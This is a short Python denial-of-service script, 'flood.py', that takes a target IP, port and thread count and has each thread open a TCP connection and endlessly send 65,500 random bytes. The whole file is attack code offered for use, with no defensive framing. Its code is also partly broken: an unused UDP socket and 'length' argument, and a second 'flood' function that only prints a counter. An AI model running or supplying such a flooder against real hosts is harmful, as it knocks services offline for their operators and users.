#!/usr/bin/python
import socket, sys, random, time, threading

if len(sys.argv) == 5:
    # Get IP, Port, length of attavk, and threads
    ip = sys.argv[1]
    port = int(sys.argv[2])
    length = int(sys.argv[3])
    threads  = int(sys.argv[4])
else:
    print("Run: python3 flood.py ip port length(broken) threads")
    exit(1)

# Create socket for server
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
print("Ctrl+c to exit the program")

data=random._urandom(65500)
def flood():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    while True:
        s.sendto(data,(ip,port))
    s.close()

for i in range(threads):
    thread = threading.Thread(target=flood)
    thread.start()

attack_num = 0

def flood():
    while True:
        global attack_num
        attack_num += 1
        print(attack_num)
